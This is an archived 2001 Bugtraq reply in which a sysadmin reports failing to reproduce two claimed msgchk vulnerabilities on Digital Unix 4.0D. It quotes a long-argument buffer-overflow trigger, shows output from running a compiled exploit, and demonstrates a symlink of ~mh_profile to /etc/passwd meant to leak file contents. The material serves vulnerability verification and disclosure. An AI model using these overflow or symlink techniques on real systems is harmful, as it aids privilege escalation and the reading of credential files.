OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Boyce, Nick (nick.boyceeds.com)
Date: Wed Sep 12 2001 - 04:54:41 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    [Resend: my original reply to Bugtraq on Monday 10th has not appeared, and
    I haven't seen any other followup; this time I've replaced all weird >
    ASCII 127 characters in my screen dumps by X's in case that prevented my
    email's handling by some MTA somewhere]

    On 10 September 2001 03:54, SeungHyun Seo said :

    > there were multiple vulnerabilities in "/usr/bin/mh/msgchk" on digital
    > unix 4.0x. it's a mail utility - check for messages (only available within
    the
    > message handlin system, mh)
    [...]
    > /usr/bin/mh/msgchk is affected to buffer overflow vulnerability
    >
    > -- snip --
    > $ /usr/bin/mh/msgchk `perl -e 'print "A"x9000'`
    > AAAAAAAAAAAAA ... ...
    > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA :
    > msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAA ... ...
    > AAAAAAAAAAAAAAAAAAAAAAA
    > Memory fault(coredump)
    > -- snip --

    NOT confirmed. On my system (Digital Unix 4.0D, Patch Kit 5) this gives me
    :

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
    AAAAAAAAAAAAAA :
       msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    followed by another command prompt.

    And the exploit doesn't work :

    /usr/users/joesoap/bin>cc msgbreak.c -o msgbreak -std
    /usr/users/joesoap/bin>msgbreak
    I'm going to create the standard MH path for you.
    AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
     .... [lots of pairs of "G" followed by "y" with an upsilon accent]
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     .... [even more A's]
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA XX :
       msgchk: no such user as AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    /usr/users/joesoap/bin>whoami
    joesoap
    /usr/users/joesoap/bin>uname -a
    OSF1 mybox V4.0 878 alpha

    (Lines wrapped for readability, and unprintable blobs replaced by X's.)

    Looks like there must have been a patch for this somewhere in Patch Kits 1
    thru 5.
    Or maybe the hole only exists *prior* to 4.0D.

    Part 2:

    > Next , /usr/bin/mh/msgchk has a vulnerability that anyone read 1 line
    > of the unprivileged file on the system it's a old bug on redhat linux
    2.0,
    > but it also works on digital unix 4.0x

    This hole doesn't work either :

    /usr/users/joesoap>ln -sf /etc/passwd ./~mh_profile
    /usr/users/joesoap>/usr/bin/mh/msgchk
    joesoap :
       No file-source mail waiting; last read on Wed, 27 Sep 2000 17:48:21 BST

    /usr/users/joesoap>head -2 ./~mh_profile
    root:xxxxxxxxxxxxx:0:1:system PRIVILEGED account:/:/bin/csh
    nobody:*Nologin:65534:65534:anonymous NFS user:/:

    Nick Boyce
    EDS, Bristol, UK